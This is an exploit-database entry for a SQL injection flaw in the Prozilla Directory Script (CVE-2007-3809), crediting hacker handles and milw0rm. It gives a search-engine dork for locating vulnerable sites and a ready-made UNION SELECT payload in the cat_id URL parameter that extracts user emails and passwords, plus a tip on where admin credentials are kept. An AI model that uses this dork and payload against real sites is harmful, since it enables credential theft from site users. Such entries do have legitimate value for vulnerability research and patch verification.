Prozilla Directory Script - 'Directory.php?cat_id' SQL Injection
Author: t0pP8uZz
type: webapps
platform: php
port:
date_added: 2007-07-13
date_updated:
verified: 1
codes: OSVDB-36512;CVE-2007-3809
tags:
aliases:
screenshot_url:
application_url:
--==+================================================================================+==--
--==+ Prozilla Directory Script SQL Injection Vulnerbility +==--
--==+================================================================================+==--
AUTHOR: t0pP8uZz & xprog
SITE: http://www.prozilla.com/
DORK: allinurl:directory.php?ax=list
DESCRIPTION:
SQL injection in cat_id of directory.php among others. Able to retrieve email/passwords
of users who posted URLs in the directory.
EXPLOITS:
http://www.site.com/directory.php?ax=list&sub=1&cat_id=-1/**/UNION/**/SELECT/**/1,2,3,4,concat(0x2D2D3E,email,0x3a,password),6,7,8,9,10,0x223E3C212D2D,12,13/**/from/**/links/*
NOTE/TIP:
Doesnt look like admin info is stored in the database, must be config.
GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net !
--==+================================================================================+==--
--==+ Prozilla Directory Script SQL Injection Vulnerbility +==--
--==+================================================================================+==--
# milw0rm.com [2007-07-14]